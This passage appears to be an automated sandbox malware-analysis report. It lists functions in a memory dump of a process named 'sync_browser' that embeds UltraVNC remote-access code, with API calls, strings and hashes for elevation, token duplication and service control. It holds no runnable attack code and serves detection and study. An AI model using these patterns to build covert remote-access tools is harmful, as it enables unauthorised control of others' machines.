GetProcAddress.KERNEL32 ref: 00007FF67E7CA3E3
FreeLibrary.KERNEL32 ref: 00007FF67E7CA407

Strings

SHGetSettings, xrefs: 00007FF67E7CA3D9
shell32.dll, xrefs: 00007FF67E7CA39F, 00007FF67E7CA3C0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHGetSettings$shell32.dll
API String ID: 145871493-1819508790
Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction ID: 44d166203d7eccadf63ba809a708865927b49c15f89adf4937475577093d0d31
Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
Instruction Fuzzy Hash: C2119122F2D74182FE508B69F484179A3A8EFA8B81F481535FA1F837A5DF2CE549C300

Function 00007FF67E7D7FB0 Relevance: 10.5, APIs: 7, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7D7FC9
ResetEvent.KERNEL32 ref: 00007FF67E7D7FE6
ResetEvent.KERNEL32 ref: 00007FF67E7D7FF0
SetEvent.KERNEL32 ref: 00007FF67E7D7FFA
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D8009
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D804A
SetEvent.KERNEL32 ref: 00007FF67E7D8066

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$ObjectResetSingleWait$CriticalEnterSection
String ID:
API String ID: 3343876880-0
Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
Instruction ID: faec473cfd70d620fe3ead6bb4d0b132414ef3a839d1252e4073f3a5984574c3
Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
Instruction Fuzzy Hash: 75212477A28B8193EB589F26D6842ADA364FB95B95F105031EB1E87650CF3CE4B9C700

Function 00007FF67E7EC4E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00007FF67E7EC52A
EnterCriticalSection.KERNEL32 ref: 00007FF67E7EC551
RevertToSelf.ADVAPI32 ref: 00007FF67E7EC56C
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EC57C

Strings

vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF67E7EC515
vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF67E7EC557

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRevertSelfTimetime
String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
API String ID: 4293870407-1873781047
Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction ID: c888ac44db82c69384b5d4481284fb8c4b1904e8c823d00ad08ae1687a6d0b4b
Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
Instruction Fuzzy Hash: 18117057E289C255FB548B74D5483BD6792EF68788F180035E64D8A291CF2CA09DC340

Function 00007FF67E7D3620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D364B
GetForegroundWindow.USER32 ref: 00007FF67E7D365C
ShellExecuteExA.SHELL32 ref: 00007FF67E7D369F

Strings

-rebootforce, xrefs: 00007FF67E7D3693
runas, xrefs: 00007FF67E7D3671
p, xrefs: 00007FF67E7D3653

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootforce$p$runas
API String ID: 3648085421-45594291
Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction ID: f8b88b9be362a1fa56dd456b385c1d878428b1680384eadc2f84780962fe8b56
Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction Fuzzy Hash: AF01DA32A29B8185E7219F54F49439BB3A4FB99344F80023AEACD42B68DF7CD158CB00

Function 00007FF67E7D36C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D36EB
GetForegroundWindow.USER32 ref: 00007FF67E7D36FC
ShellExecuteExA.SHELL32 ref: 00007FF67E7D373F

Strings

runas, xrefs: 00007FF67E7D3711
p, xrefs: 00007FF67E7D36F3
-rebootsafemode, xrefs: 00007FF67E7D3733

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootsafemode$p$runas
API String ID: 3648085421-4291177908
Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction ID: 5ecc848a235272f49df1c25cdc9562598a4c2baee6d89ade59f5121c4beaa217
Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction Fuzzy Hash: 0901DA32A29B8185E7219F54F49439BB3A4FB99344F80023AEACD42B68DF7CD158CB00

Function 00007FF67E7C9910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7C9939
GetForegroundWindow.USER32 ref: 00007FF67E7C9948
ShellExecuteExA.SHELL32 ref: 00007FF67E7C9997

Strings

runas, xrefs: 00007FF67E7C9953
p, xrefs: 00007FF67E7C993F
-stopservice, xrefs: 00007FF67E7C997A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -stopservice$p$runas
API String ID: 3648085421-4230321595
Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
Instruction ID: 993c52960acf2065fd0b94cdbbe849e8772cd0c65258237b35f2ddc0a1759353
Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
Instruction Fuzzy Hash: 0B01EC36A28F81C5E7609F10F49439AB3A4FB99744F800235E6CD42BA8DF7DD158CB40

Function 00007FF67E7C9BD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7C9BF9
GetForegroundWindow.USER32 ref: 00007FF67E7C9C08
ShellExecuteExA.SHELL32 ref: 00007FF67E7C9C57

Strings

runas, xrefs: 00007FF67E7C9C13
p, xrefs: 00007FF67E7C9BFF
-securityeditor, xrefs: 00007FF67E7C9C3A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -securityeditor$p$runas
API String ID: 3648085421-1380712588
Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction ID: db1aa76e2487bd8050bd6e45ac65b61d85553d090f6a527d298f099124fd75b4
Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction Fuzzy Hash: D001EC36A29B8185E7609F10F49439AB3A4FB99744F800235E6CD42B68DF7DD158CB40

Function 00007FF67E7C99C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7C99E9
GetForegroundWindow.USER32 ref: 00007FF67E7C99F8
ShellExecuteExA.SHELL32 ref: 00007FF67E7C9A47

Strings

runas, xrefs: 00007FF67E7C9A03
p, xrefs: 00007FF67E7C99EF
-startservice, xrefs: 00007FF67E7C9A2A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -startservice$p$runas
API String ID: 3648085421-278061118
Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction ID: da79334f3b62452a7b0e00ae569920b3c01796fac247737d8980de82e617572e
Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction Fuzzy Hash: 1E01EC36A28B8185E7609F10F49439AB3A4FB99744F800235E6CD42B68DF7DD158CB40

Function 00007FF67E7CC6A0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

%s:%s, xrefs: 00007FF67E7CC740
Proxy-Authorization: Basic %s, xrefs: 00007FF67E7CC78C
Enter proxy authentication password for %s@%s: , xrefs: 00007FF67E7CC6E0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID:
String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
API String ID: 0-3750121419
Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction ID: d252530a3b37f3f4ef31fa51924e25b335b194df3671781af98c9de9ea60cc2f
Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction Fuzzy Hash: 0131E463B2568144EA10DB76A8401A9A794EB59BF4F541735FE3D87BE5EE3CD089C300

Function 00007FF67E7DFFA0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E7DFFFD

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

free.LIBCMT ref: 00007FF67E7E0097

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

free.LIBCMT ref: 00007FF67E7E00BF

Strings

vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF67E7E0053
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF67E7DFFE0
This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF67E7E0068

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
API String ID: 1063416079-3080451256
Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
Instruction ID: fce61c98137ab913b475ab2f68f6b2729836fd4deb2af358fb525aa9dbf438b5
Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
Instruction Fuzzy Hash: F031A422728A8141EA40DB65E8542FAA361EF94BB4F585332F97EC76E5DE2CD449C300

Function 00007FF67E857C90 Relevance: 9.1, APIs: 6, Instructions: 64synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E857CA9
LeaveCriticalSection.KERNEL32 ref: 00007FF67E857CC3

Part of subcall function 00007FF67E882950: RaiseException.KERNEL32 ref: 00007FF67E8829CB

LeaveCriticalSection.KERNEL32 ref: 00007FF67E857CE7
TlsGetValue.KERNEL32 ref: 00007FF67E857CF3
WaitForSingleObject.KERNEL32 ref: 00007FF67E857D3B
GetLastError.KERNEL32 ref: 00007FF67E857D45

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
String ID:
API String ID: 824239979-0
Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction ID: 0f1720fae54da996fa996fc7b36dc7ef745ba87c517e27588b19d0cf59382419
Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction Fuzzy Hash: B2218133A38A4282EB428F24E844179B3A0FBA5B84F445531FA4F876A9DF2CD94DC700

Function 00007FF67E7D1C10 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00007FF67E7D1C72
OpenProcessToken.ADVAPI32 ref: 00007FF67E7D1C92
DuplicateTokenEx.ADVAPI32 ref: 00007FF67E7D1CB8
SetTokenInformation.ADVAPI32 ref: 00007FF67E7D1CD2
CloseHandle.KERNEL32 ref: 00007FF67E7D1CDD
CloseHandle.KERNEL32 ref: 00007FF67E7D1CE6

Part of subcall function 00007FF67E7D19A0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E7D19C6
Part of subcall function 00007FF67E7D19A0: Process32First.KERNEL32 ref: 00007FF67E7D19E5
Part of subcall function 00007FF67E7D19A0: CloseHandle.KERNEL32 ref: 00007FF67E7D19F2

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
String ID:
API String ID: 3355884492-0
Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
